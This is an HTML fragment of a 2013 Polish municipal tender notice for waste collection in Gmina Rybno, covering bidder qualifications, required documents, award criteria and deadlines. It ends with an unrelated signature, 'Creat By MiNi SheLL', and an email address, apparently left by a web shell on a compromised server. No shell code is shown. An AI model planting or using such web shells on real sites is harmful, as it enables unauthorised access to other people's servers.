<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy spełniają warunki określone w art. 22 ust.1 Ustawy , tj. warunki dotyczące:1)dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia;
W tym zakresie Zamawiający wymaga , aby Wykonawca na dzień otwarcia ofert, spełniał wymagania określone w Rozporządzeniu  Ministra Środowiska  z dnia  11 stycznia  2013 roku w sprawie  szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości ( Dz. U. z 2013r. poz.122); w szczególności  dysponował  co najmniej:
a)  1  pojazdem przystosowanym  do odbierania zmieszanych odpadów komunalnych;
b)  1  pojazdem  przystosowanym do odbierania selektywnie zebranych odpadów komunalnych
c)  1 pojazdem do odbierania  odpadów bez funkcji kompaktującej.
Opis  sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu:
1)ocena ofert w zakresie spełniania warunków  udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia/ nie spełnia tzn. każdy z Wykonawców musi spełniać wszystkie  enumeratywnie  wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy;
2)sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia  przedmiotowego postępowania;3)w przypadku złożenia przez Wykonawcę dokumentów  zawierających  dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy spełniają warunki określone w art. 22 ust.1 Ustawy , tj. warunki dotyczące: 1) dysponowania osobami zdolnymi do wykonywania zamówienia. 
Opis  sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu:
1)ocena ofert w zakresie spełniania warunków  udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia/ nie spełnia tzn. każdy z Wykonawców musi spełniać wszystkie  enumeratywnie  wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy;
2)sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia  przedmiotowego postępowania;
3)w przypadku złożenia przez Wykonawcę dokumentów  zawierających  dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy spełniają warunki określone w art. 22 ust.1 Ustawy , tj. warunki dotyczące: 1) sytuacji ekonomicznej i finansowej.
W tym zakresie Zamawiający wymaga , aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości  nie mniejszej niż 300 000,00zł ( słownie : trzysta  tysięcy złotych 00/100) , przy czym ważność polisy , a w przypadku jej braku innego dokumentu ubezpieczenia musi obejmować co najmniej dzień składania oferty.
Wykonawca , który zostanie wybrany na Wykonawcę przedmiotu zamówienia publicznego zobowiązany jest do przedstawienia zamawiającemu przed podpisaniem umowy  w sprawie zamówienia publicznego opłaconej polisy lub innego dokumentu ubezpieczenia potwierdzającego , że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż  300 000,00zł ( słownie : trzysta  tysięcy złotych 00/100). Obowiązek ten nie dotyczy Wykonawcy, którego polisa lub inny dokument ubezpieczenia złożony wraz z ofertą obejmuje okres objęty realizacją przedmiotu zamówienia.  W przypadku przedstawienia przez Wykonawcę Zamawiającemu przed podpisaniem umowy w sprawie zamówienia publicznego opłaconej polisy  lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie  prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 300 000,00 zł  ( słownie : trzysta tysięcy złotych 00/100)  nieobejmującego całego okresu realizacji przedmiotu zamówienia, Wykonawca ten zobowiązany jest do przedstawienia Zamawiającemu kolejnych opłaconych polis lub innych dokumentów  potwierdzających , że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 300 000,00zł ( słownie : trzysta  tysięcy złotych 00/100) w okresie realizacji przedmiotu zamówienia.
Opis  sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu
1)ocena ofert w zakresie spełniania warunków  udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia/ nie spełnia tzn. każdy z Wykonawców musi spełniać wszystkie  enumeratywnie  wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy;2)sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia  przedmiotowego postępowania;3)w przypadku złożenia przez Wykonawcę dokumentów  zawierających  dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentacji( jeśli jest wymagane)
Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy mogą nastąpić jedynie w formie pisemnej pod rygorem nieważności.
2.	Zmiana postanowień niniejszej umowy może nastąpić jedynie w razie zaistnienia następujących okoliczności :
a) klęski żywiołowe
b) inne warunki atmosferyczne odbiegające  od typowych , uniemożliwiające wykonanie przedmiotu niniejszej umowy
c) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy , skutkujące niemożliwością wykonania przedmiotu niniejszej umowy lub wykonywania czynności przewidzianych niniejszą umową.
3.	W przypadkach , o których mowa w ust.2 
1) Wykonawca nie ponosi odpowiedzialność za szkody  wynikające z opóźnienia lub niewykonania jego zobowiązań wynikających  z niniejszej umowy,
2) Wykonawca zobowiązany będzie prowadzić te czynności , których realizacja nie podlega ograniczeniom wynikającym z przypadków , o których mowa w ust.2, chyba że Zamawiający uzna ,iż prawdopodobne jest tylko częściowe wykonanie czynności , które będą dla niego nieprzydatne.
3) Wykonawca zobowiązany jest uzgodnić z Zamawiającym , czy i jakie alternatywne  środki są możliwe do zastosowania  w celu prowadzenia czynności objętych niniejszą umową w przypadkach, o których mowa w ust. 2 oraz zobowiązany jest do podjęcia działań uzgodnionych w zakresie przez obydwie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rybno.e-sochaczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rybno, ul. Długa 20, 96-514 Rybno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2013 godzina 10:00, miejsce: Urząd Gminy Rybno, ul. Długa 20, 96-514 Rybno, sekretariat pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com